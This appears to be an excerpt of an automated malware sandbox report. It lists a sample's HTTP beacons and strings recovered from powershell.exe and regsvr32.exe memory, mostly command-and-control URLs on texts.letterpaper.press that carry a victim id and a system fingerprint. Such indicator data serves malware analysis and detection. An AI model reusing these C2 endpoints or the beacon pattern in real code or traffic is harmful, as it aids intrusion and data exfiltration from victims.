        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST //?m=c&p1=8ace1190 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: texts.letterpaper.pressContent-Length: 0Cache-Control: no-cache
        Source: powershell.exe, 00000004.00000002.454312297.0000022E38F9E000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.519223308.000001ACA52BD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000004.00000002.452083262.0000022E20FB9000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.496611128.000001AC8D2AF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69%
        Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.694
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.695
        Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69;
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C
        Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69G
        Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69L
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69M
        Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69O
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69U
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69W
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Y
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69e
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69i
        Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69k
        Source: regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69n
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69o
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBm
        Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69q
        Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69u
        Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69z
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190%
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190&
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11902
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11902M)
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace11906
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190?
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190B
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190I
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190J
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190K
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190K8(
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190KP7
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190N
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190SL
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190V
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b$(
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190b7
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190bK
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190bK6(
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190db
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190db;M
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbVM5
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbXM
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLb
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190k
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190p2=c
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190sMh
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190w
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190w(:
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190z
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190#
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190#~
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190$
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190&M
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190(z
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190)M
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190)t
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190-(
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190.
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190/
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11901t
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11903
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace119037
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904&2qt
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11904N
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11905C
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11905t
        Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11906L
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11907
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace11909
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190;
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190=N
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190=t
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190?
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190?L
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190A(
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190AC
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190AL:
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190B
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190C
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190D
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190EC
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Et
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190F
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190FN
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190G
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190G~
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190H
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190HN
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190It
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190I~
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190J
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K/M
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K0
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190K7
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Kz
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190LM
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190MC
        Source: regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Mt
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190N
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O$
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190O-
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190P
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190PO
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Q
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190QN
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190R
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190S
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190SL
        Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190T
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190UM
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190V
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190W
        Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190Y
        Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190YC
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190_M
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190b
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190b(
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bCM
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bJ(
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bK
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bK:M
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bKy(
        Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bO
        Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bc
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bm~5
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bn(#
        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190bt75
        Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190c
        Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190csi
